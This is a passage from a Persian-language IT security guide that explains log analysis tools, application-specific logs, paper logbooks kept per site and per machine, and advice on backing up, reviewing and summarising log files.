‫ﺻﺮﻑ ﺛﺒﺖ ﻛﺮﺩﻥ ﻭﻗﺎﻳﻊ ﻛﺎﻓﻲ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﻜﻪ ﺛﺒﺘﻬﺎ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﻣﻄﺎﻟﻌﻪ ﻭ ﺑﺮﺭﺳﻲ ﻣﺪﺍﻭﻡ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﺩﺭ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻛﻪ ﺩﺭ ﻫﺮ‬
‫ﺳﺎﻋﺖ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻥ ﺻﺪﻫﺎ ﻳﺎ ﻫﺰﺍﺭﺍﻥ ﺭﺧﺪﺍﺩ ﺛﺒﺖ ﺷﻮﺩ‪ ،‬ﺣﺘﻲ ﻓﻜ ﹺﺮ ﺧﻮﺍﻧﺪﻥ ﺁﻧﻬﺎ ﻫﻢ ﺭﺍﻫﺒﺮﺍﻥ ﺭﺍ ﺑﻪ ﻭﺣﺸﺖ ﻣﻲﺍﻧـﺪﺍﺯﺩ‪ .‬ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﺗﺤﻠﻴﻞ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺳﻌﻲ ﻣﻲﻛﻨﻨﺪ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺑﺎ ﺟﻤﻌﺒﻨﺪﻱ ﻭ ﺧﻼﺻﻪﺳﺎﺯﻱ )ﻏﺮﺑﺎﻝﻛﺮﺩﻥ( ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺳﺎﺩﻩﺗﺮ ﻛﻨﻨﺪ ﻭ ﺗﻮﺟﻪ ﺷﻤﺎ ﺭﺍ‬
‫ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎﻱ ﻣﻬﻢ ﺟﻠﺐ ﻭ ﺍﺯ ﺭﺧﺪﺍﺩﻫﺎﻱ ﻋﺎﺩﻱ ﺩﻭﺭ ﻧﻤﺎﻳﻨﺪ‪.‬‬

‫‪ ۳۳۷‬ﺑﺮﺍﻱ ﺑﺤﺚ ﺟﺰﺋﻲﺗﺮ ﺩﺭ ﻣﻮﺭﺩ ﭘﻴﻜﺮﺑﻨﺪﻱ‪ ،‬ﺍﻭﻟﻮﻳﺘﻬﺎ ﻭ ﺗﺴﻬﻴﻼﺕ ﺍﻧﺠﺎﻡ ﺛﺒﺖ ﺩﺭ ‪ ،Unix‬ﺑﻪ ﺻﻔﺤﺎﺕ ‪ ۶۴۲‬ﺗﺎ ‪ ۶۵۴‬ﺍﺯ ﮐﺘﺎﺏ ‪ PUIS‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٢٨‬‬

‫ﺑﺮﺧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺤﻠﻴﻞ ﻣﺎﻧﻨﺪ ‪ Microsoft Event Viewer‬ﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﺻﺎﻓﻴﻬﺎ ﻭ ﻋﻮﺍﻣﻞ ﻣﻮﺭﺩ ﻧﻈـﺮ ﺧـﻮﺩ ﺭﺍ ﺍﻧﺘﺨـﺎﺏ‬
‫ﻛﻨﻴﺪ‪ .‬ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﻣﺎﻧﻨﺪ ‪ Swatch‬ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ Unix‬ﺑﺼﻮﺭﺕ ﺑﻼﺩﺭﻧﮓ ﺑﺮ ﺛﺒﺘﻬﺎ ﻧﻈﺎﺭﺕ ﻣﻲﻛﻨﻨـﺪ ﻭ ﻫﺮﮔـﺎﻩ ﺍﺗﻔـﺎﻕ ﻣﻬﻤـﻲ‬
‫‪٣٣٨‬‬
‫ﺑﻴﺎﻓﺘﺪ ﺍﺧﻄﺎﺭ ﻣﻲﺩﻫﻨﺪ‪.‬‬

‫ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺍﺧﺘﺼﺎﺻﻲ ﺑﺮﻧﺎﻣﻪﻫﺎ‬


‫ﺑﻴﺸﺘﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺧﺼﻮﺻﹰﺎ ‪daemon‬ﻫﺎ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨـﺪ‪ .‬ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﻭﺏ ﻭ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ FTP‬ﻫﻤﻮﺍﺭﻩ ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻞ ﻭ ﺍﺗﺼﺎﻻﺕ ﺭﺍ ﺛﺒﺖ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ‪ DNS‬ﻧﻴـﺰ ﺩﺭﺧﻮﺍﺳـﺘﻬﺎ ﻭ ﺍﻧﺘﻘﺎﻟﻬـﺎﻱ‬
‫ﺩﺍﻣﻨﻪﻫﺎ ﺭﺍ ﺑﻪ ﺛﺒﺖ ﻣﻲﺭﺳﺎﻧﻨﺪ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﺍﻱ ‪query‬ﻫﺎ ﺭﺍ ﺛﺒﺖ ﻣﻲﻧﻤﺎﻳﻨﺪ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﻫﻤﻮﺍﺭﻩ ﺍﺗﺼﺎﻻﺕ ﻭ ﺍﻃﻼﻋﺎﺗﻲ ﭼﻮﻥ ﺍﻧﺪﺍﺯﺓ ﭘﻴﺎﻣﻬﺎ ﻫﻨﮕﺎﻡ ﺍﺭﺳﺎﻝ ﻭ ﺩﺭﻳﺎﻓﺖ ﺷﺪﻥ ﺁﻧﻬﺎ ﺭﺍ ﺛﺒﺖ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺧﻄﺎﻫﺎ ﻭ ﺷﺮﺍﻳﻂ ﺍﺳـﺘﺜﻨﺎﻳﻲ ﺗﻘﺮﻳﺒـﹰﺎ‬
‫ﻫﻤﻴﺸﻪ ﺛﺒﺖ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﺭﺩ‪ ،‬ﺍﺑﺰﺍﺭﻫﺎﻱ ﺗﺤﻠﻴـﻞ ﺑـﺮﺍﻱ ﺧﻼﺻـﻪ ﻛـﺮﺩﻥ ﻭ ﺗﻬﻴـﺔ ﮔﺰﺍﺭﺷـﻬﺎﻳﻲ ﻗﺎﺑـﻞ ﺍﺳـﺘﻔﺎﺩﻩﺗـﺮ ﺍﺯ ﺛﺒﺘﻬـﺎﻱ‬
‫ﻣﺨﺼﻮﺹ ﻫﺮ ﺑﺮﻧﺎﻣﻪ ﻧﻴﺰ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩﺍﻧﺪ‪.‬‬

‫ﺛﺒﺘﻬﺎﻱ ﺩﺳﺖﻧﻮﻳﺲ‬
‫ﻧﻮﻉ ﺩﻳﮕﺮﻱ ﺍﺯ ﺛﺒﺖ ﻛﻪ ﺩﺭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪ ﺍﻧﺠﺎﻡ ﻧﻤـﻲﭘـﺬﻳﺮﺩ‪ ،‬ﺑﻠﻜـﻪ ﺑﻮﺳـﻴﻠﺔ ﺧـﻮﺩ ﺷـﻤﺎ ﻭ ﻛﺎﺭﻣﻨـﺪﺍﻥ‬
‫ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ‪ .‬ﻳﻚ ﺩﻓﺘﺮﭼﻪ ﺑﺮﺍﻱ ﺛﺒﺖ ﻭﻗﺎﻳﻊ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺭﻭﺯﺍﻧﺔ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺁﻥ ﺛﺒﺖ ﻛﻨﻴﺪ‪ .‬ﺩﻓﺎﺗﺮ ﺛﺒﺖ ﺑﺎﻳﺪ ﻛﺎﻏﺬﻱ ﺑﺎﺷﻨﺪ‬
‫ﻭ ﺩﺭ ﻣﻜﺎﻧﻲ ﻧﮕﻬﺪﺍﺷﺘﻪ ﺷﻮﻧﺪ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻓﻴﺰﻳﻜﻲ ﺍﻣﻦ ﺑﺎﺷﺪ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﺭﻭﻱ ﻛﺎﻏﺬ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻛﺴﻲ ﻛﻪ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪ ﺷـﻤﺎ‬
‫ﺣﺘﻲ ﺑﺎ ﺍﻣﺘﻴﺎﺯ ﺩﺳﺘﺮﺳﻲ ﺍﺑﺮﻛﺎﺭﺑﺮ ﻭﺍﺭﺩ ﺷﻮﺩ‪ ،‬ﻧﻤﻲﺗﻮﺍﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ‪ .‬ﺍﻳﻦ ﺛﺒﺘﻬﺎ ﻳﻚ ﺑﺎﻳﮕﺎﻧﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻣﻬـﻢ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺑـﺼﻮﺭﺕ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻗﺎﺑﻞ ﺩﺳﺘﻜﺎﺭﻱ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫ﺛﺒﺘﻬﺎﻱ ﺩﺳﺖﻧﻮﻳﺲ ﻣﺰﺍﻳﺎﻱ ﻣﺘﻌﺪﺩﻱ ﻧﺴﺒﺖ ﺑﻪ ﺛﺒﺘﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺍﺭﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺠﺎ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﻣـﺴﺎﺋﻠﻲ ﺭﺍ ﺛﺒـﺖ ﻛﻨﻴـﺪ ﻛـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎ‬
‫ﻼ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺑﻪ ﺑﻤﺐﮔﺬﺍﺭﻱ‪ .‬ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺣﺘﻲ ﻭﻗﺘﻲ ﺳﻴﺴﺘﻢ ﺧﺎﻣﻮﺵ ﺍﺳﺖ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺛﺒﺘﻬﺎﻱ ﻛﺎﻏـﺬﻱ ﺭﺍ ﺑﺨﻮﺍﻧﻴـﺪ‪.‬‬ ‫ﻧﻤﻲﺗﻮﺍﻧﻨﺪ‪ ،‬ﻣﺜ ﹰ‬
‫ﺩﺭ ﻗﻮﺍﻧﻴﻦ ﺑﺮﺧﻲ ﻛﺸﻮﺭﻫﺎ ﺛﺒﺘﻬﺎﻱ ﻛﺎﻏﺬﻱ ﻣﺪﺍﺭﻙ ﻣﻌﺘﺒﺮﺗﺮﻱ ﺍﺯ ﺛﺒﺘﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺑﺰﺭﮔﺘﺮﻳﻦ ﻣﺸﻜﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﻓﺘﺮﭼﻪﻫﺎﻱ ﺛﺒﺖ‪ ،‬ﺯﻣﺎﻥ ﺯﻳﺎﺩﻱ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺑﻪ ﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺁﻧﻬﺎ ﻻﺯﻡ ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﺩﻳﮕـﺮ ﻧﻤـﻲﺗـﻮﺍﻥ‬
‫ﻋﻤﻠﻴﺎﺕ ﺛﺒﺖ ﺭﺍ ﺑﻪ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﺧﻮﺩﻛﺎﺭ ﺳﭙﺮﺩ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻳﻦ ﻣﻌﻀﻞ ﺯﻣﺎﻧﻲ ﺑﺰﺭﮔﺘﺮﻳﻦ ﺩﻟﻴﻠـﻲ ﺍﺳـﺖ ﻛـﻪ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ ﺭﺍﻫﺒـﺮﺍﻥ‬
‫ﺳﻴﺴﺘﻤﻬﺎ ﺩﺭ ﺍﺳﺘﻔﺎﺩﺓ ﻣﺪﺍﻭﻡ ﺍﺯ ﺍﻳﻦ ﻗﺒﻴﻞ ﺛﺒﺘﻬﺎ ﺍﻛﺮﺍﻩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ )ﺑﺨﺼﻮﺹ ﺩﺭ ﺍﺩﺍﺭﻩﻫﺎﻳﻲ ﺑﺎ ﺻﺪﻫﺎ ﻳﺎ ﻫﺰﺍﺭﺍﻥ ﺭﺍﻳﺎﻧﻪ ﻛﻪ ﻫﺮﻳﻚ ﺍﺯ ﺁﻧﻬﺎ ﻧﻴـﺎﺯ ﺑـﻪ ﻳـﻚ‬
‫ﺩﻓﺘﺮﭼﺔ ﺛﺒﺖ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺩﺍﺭﺩ(‪ .‬ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﺷﻮﺩ ﺑﺠﺎﻱ ﺗﻼﺵ ﺑﻴﻬﻮﺩﻩ ﺑﺮﺍﻱ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻦ ﭼﻨﺪﻳﻦ ﺩﻓﺘﺮﭼﺔ ﺛﺒﺖ‪ ،‬ﺳﻌﻲ ﻛﻨﻴﺪ ﺑﺎ ﻛﻤﻲ‬
‫ﺧﻼﻗﻴﺖ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﻛﻢ ﻛﺮﺩﻥ ﺣﺠﻢ ﺛﺒﺘﻬﺎ ﺑﺪﻭﻥ ﻛﺎﺳﺘﻪ ﺷﺪﻥ ﺍﺯ ﺍﺭﺯﺵ ﺁﻥ ﺑﻴﺎﺑﻴﺪ‪ .‬ﺩﻭ ﺭﻭﺵ ﺑﺮﺍﻱ ﻛﺎﺳﺘﻦ ﺍﺯ ﺛﺒﺘﻬﺎﻱ ﺍﺿـﺎﻓﻲ ﻋﺒﺎﺭﺗﻨـﺪ ﺍﺯ‬
‫"ﻓﺸﺮﺩﻩﺳﺎﺯﻱ ﺍﻃﻼﻋﺎﺕ ﺛﺒﺖ" ﻭ "ﻧﮕﻬﺪﺍﺭﻱ ﺛﺒﺖ ﮔﺮﻭﻫﻲ ﺑﺮﺍﻱ ﺩﺳﺘﻪﺍﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ"؛ ﮐﻪ ﻫﺮﮐﺪﺍﻡ ﺍﮔﺮ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﺍﻧﺠﺎﻡ ﺷﻮﻧﺪ‪ ،‬ﭼﻴﺰﻱ‬
‫ﺍﺯ ﺍﺭﺯﺵ ﺛﺒﺘﻬﺎ ﻧﻤﻲﻛﺎﻫﻨﺪ‪.‬‬
‫ﺍﺳﺎﺳﹰﺎ ﺩﻭ ﻧﻮﻉ ﺩﻓﺘﺮﭼﺔ ﺛﺒﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ :‬ﺛﺒﺖ ﺑﻪ ﺍﺯﺍﻱ ﻫﺮ ﺍﺩﺍﺭﻩ‪ ،‬ﻭ ﺛﺒﺖ ﺑﻪ ﺍﺯﺍﻱ ﻫﺮ ﺭﺍﻳﺎﻧـﻪ‪ .‬ﺩﺭ ﺩﻓﺘﺮﭼـﻪﻫـﺎﻱ ﺛﺒـﺖ ﺑـﻪ ﺍﺯﺍﻱ ﻫـﺮ ﺍﺩﺍﺭﻩ ﺍﺯ‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺗﻤﺎﻡ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﻋﻤﻠﻴﺎﺕ ﺷﻤﺎ ﻣﻔﻴﺪ ﻫﺴﺘﻨﺪ‪ .‬ﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ ﮔـﺰﺍﺭﺵ ﺭﺧـﺪﺍﺩﻫﺎ ﻭ‬
‫ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﺳﺘﺜﻨﺎﻳﻲ )ﻗﻄﻌﻲ ﺑﺮﻕ‪ ،‬ﻓﻌﺎﻝ ﺷﺪﻥ ﻭ ﺗﺴﺖ ﺯﻧﮓﺧﻄﺮﻫﺎ‪ ،‬ﻛﺎﺭﻫﺎﻱ ﭘﺮﺳﻨﻠﻲ ﺭﻭﻱ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺑﺎ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺧـﺎﺹ(‪ ،‬ﻭ ﻣـﻮﺍﺩ ﺍﻃﻼﻋـﺎﺗﻲ )ﺍﻃﻼﻋـﺎﺕ‬
‫ﺗﻤﺎﺱ‪ ،‬ﺭﺳﻴﺪﻫﺎﻱ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭ‪ ،‬ﺷﻤﺎﺭﻩﺳـﺮﻳﺎﻝ ﺍﺑﺰﺍﺭﻫـﺎ‪ ،‬ﺁﺩﺭﺱ ‪ MAC‬ﻣﺎﺷـﻴﻨﻬﺎﻱ ﻣﺠﻬـﺰ ﺑـﻪ ‪ ،Ethernet‬ﻧـﺴﺨﻪﻫـﺎﻳﻲ ﺍﺯ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﻣـﺴﻴﺮﻳﺎﺑﻬﺎ ﻭ‪(...‬‬
‫ﺗﻘﺴﻴﻢﺑﻨﺪﻱ ﻛﺮﺩ‪ .‬ﺑﺮﺍﻱ ﻫﺮ ﻣﺎﺷﻴﻦ ﻧﻴﺰ ﺑﺎﻳﺪ ﻳﻚ ﺩﻓﺘﺮﭼﺔ ﺛﺒﺖ ﻣﺨﺼﻮﺹ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﻭ ﺩﺭ ﺁﻥ ﮔﺰﺍﺭﺷـﺎﺕ ﺭﺧـﺪﺍﺩﻫﺎﻱ ﺍﺳـﺘﺜﻨﺎﻳﻲ ﻣﺜـﻞ‬
‫ﮔﺰﺍﺭﺵ ﺧﺮﺍﺑﻴﻬﺎﻱ ﺳﻴﺴﺘﻢ‪ ،‬ﺯﻣﺎﻧﻬﺎﻱ ﺧﺎﻣﻮﺵ ﺑﻮﺩﻥ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺍﻳﺠﺎﺩ ﻭ ﺣﺬﻑ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ‪ ،‬ﺗﻐﻴﻴﺮ ﺭﻣﺰ ﻋﺒـﻮﺭ‪ ،‬ﻧـﺼﺐ ﻧـﺮﻡﺍﻓـﺰﺍﺭ‪ ،‬ﻭ ﻧﻴـﺰ‬

‫‪ ۳۳۸‬ﻫﻤﺎﻥ ﻣﻨﺒﻊ‪ ،‬ﺻﻔﺤﺎﺕ ‪ ۶۵۴‬ﺗﺎ ‪.۶۵۷‬‬


‫‪٤٢٩‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﺯ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﻪ ﺛﺒﺖ ﺑﺮﺳﺎﻧﻴﺪ‪ .‬ﻣﻮﺍﺩ ﺍﻃﻼﻋﺎﺗﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺷﺎﻣﻞ ﻧﺴﺨﻪﻫـﺎﻱ ﻓﺎﻳﻠﻬـﺎﻱ ﭘﻴﻜﺮﺑﻨـﺪﻱ‪ ،‬ﻓﻬﺮﺳـﺖ ﻭﺻـﻠﻪﻫـﺎﻱ‬
‫ﺍﻋﻤﺎﻝﺷﺪﻩ‪ ،‬ﻭ ﻧﻴﺰ ﻭﺿﻌﻴﺖ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺩﻳﺴﻜﻬﺎ ﺑﺎﺷﻨﺪ‪.‬‬

‫ﻣﺪﻳﺮﻳﺖ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ‬


‫ﺩﺭ ﺍﻳﻨﺠﺎ ﭼﻨﺪ ﺗﻮﺻﻴﺔ ﭘﺎﻳﺎﻧﻲ ﺩﺭ ﻣﻮﺭﺩ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﻣﻲﺁﻭﺭﻳﻢ‪:‬‬

‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ‪ -‬ﺗﺮﺟﻴﺤﹰﺎ ﻫﺮ ﺭﻭﺯ ‪ -‬ﺑﻪ ﺭﻭﻱ ﺭﺳـﺎﻧﺔ ﭘـﺸﺘﻴﺒﺎﻥ ﻣﻨﺘﻘـﻞ ﻣـﻲﺷـﻮﻧﺪ‪ .‬ﺯﻣﺎﻧﺒﻨـﺪﻱ‬
‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺑﺎﻳﺪ ﺑﻪ ﮔﻮﻧﻪﺍﻱ ﺑﺎﺷﺪ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﻣﺘﻨﺎﻭﺑﹰﺎ ﭘﺎﻙ ﻣﻲﺷﻮﻧﺪ ﻗﺒﻞ ﺍﺯ ﭘﺎﻙ ﺷﺪﻥ ﺑـﻪ ﺭﻭﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﻣﻨﺘﻘـﻞ ﺷـﺪﻩ ﺑﺎﺷـﻨﺪ‪.‬‬
‫ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻣﻲﺷﻮﺩ ﻛﻪ ﺩﺭ ﻃﻮﻝ ﺯﻣﺎﻥ ﺳﺎﺑﻘﻪﺍﻱ ﺍﺯ ﺭﻓﺘﺎﺭ ﻭ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﺪ‪.‬‬

‫ﻣﺮﻭﺭ ﻛﺮﺩﻥ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﺍ ﺣﺪﺍﻗﻞ ﺭﻭﺯﻱ ﻳﻜﺒﺎﺭ ﻣﺮﻭﺭ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﺑﻪ ﻃﻮﺭ ﻣﺮﺗﺐ ﺛﺒﺘﻬﺎ ﺭﺍ ﻣﺮﻭﺭ ﻧﻜﻨﻴﺪ‪ ،‬ﻧﮕﻬﺪﺍﺭﻱ ﺁﻧﻬﺎ ﻛﻤﻜﻲ ﺑـﻪ ﺷـﻤﺎ ﻧﻤـﻲﻛﻨـﺪ‪ .‬ﺑـﻪ‬
‫ﻛﻤﻚ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻣﺸﻜﻼﺕ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ‪ ،‬ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺒﻜﻪ ﻭ ﻫﻤﭽﻨﻴﻦ ﻧﺎﺭﺳﺎﺋﻴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻴﺪ‪.‬‬

‫ﭘﺮﺩﺍﺯﺵ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺤﻠﻴﻠﮕﺮ‪ ،‬ﺧﻼﺻﻪ ﻛﻨﻴﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﮔﺰﺍﺭﺷﺎﺕ ﺛﺒﺖﺷـﺪﻩ ﻣﻄﻠـﺐ ﻗﺎﺑـﻞ ﺗـﻮﺟﻬﻲ ﻧﺪﺍﺭﻧـﺪ‪.‬‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﻳﺪﻥ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﺁﻧﻘﺪﺭ ﺑﺮﺍﻱ ﺷﻤﺎ ﻋﺎﺩﻱ ﺷﻮﺩ ﻛﻪ ﻃﺒﻖ ﻋﺎﺩﺕ ﺑﺮﺍﻱ ﺩﻳﺪﻥ ﺍﻳﻨﻜﻪ ﻣﺸﻜﻠﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻳﺎ ﻧﻪ‪ ،‬ﻳﻚ ﻧﮕﺎﻩ ﮔـﺬﺭﺍ‬
‫ﺑﻪ ﮔﺰﺍﺭﺷﺎﺕ ﺑﻴﺎﻧﺪﺍﺯﻳﺪ‪ ،‬ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺑﺴﻴﺎﺭ ﺍﺣﺘﻤﺎﻝ ﺩﺍﺭﺩ ﻛﻪ ﻣﺘﻮﺟﻪ ﻳﻚ ﭘﻴﺎﻡ ﻣﻬﻢ ﻧﺸﻮﻳﺪ‪.‬‬
‫ﺩﺭ ﺧﻼﺻﻪﺳﺎﺯﻱ ﺑﺎﻳﺪ ﺩﻗﺖ ﻛﻨﻴﺪ‪ .‬ﻧﺒﺎﻳﺪ ﺛﺒﺘﻬﺎ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺧﻼﺻﻪ ﮐﻨﻴﺪ ﻛﻪ ﻣﻄﺎﻟﺐ ﻣﻬﻤﻲ ﻛﻪ ﺷﻤﺎ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺑﺒﻴﻨﻴـﺪ ﺭﺍ ﺍﻧﺘﺨـﺎﺏ ﻛﻨـﺪ ﻭ‬
‫ﺑﻘﻴﻪ ﺭﺍ ﺩﻭﺭ ﺑﻴﺎﻧﺪﺍﺯﺩ‪ .‬ﺩﺭ ﭼﻨﻴﻦ ﺳﻴﺴﺘﻤﻲ ﺑﺴﻴﺎﺭ ﻣﺤﺘﻤﻞ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﭘﻴﺎﻡ ﻣﻬﻢ ﻗﺒﻞ ﺍﺯ ﺧﻮﺍﻧﺪﻩ ﺷﺪﻥ‪ ،‬ﺩﻭﺭ ﺭﻳﺨﺘـﻪ ﺷـﻮﺩ‪ .‬ﺩﺭﻋـﻮﺽ ﺑﺎﻳـﺪ‬
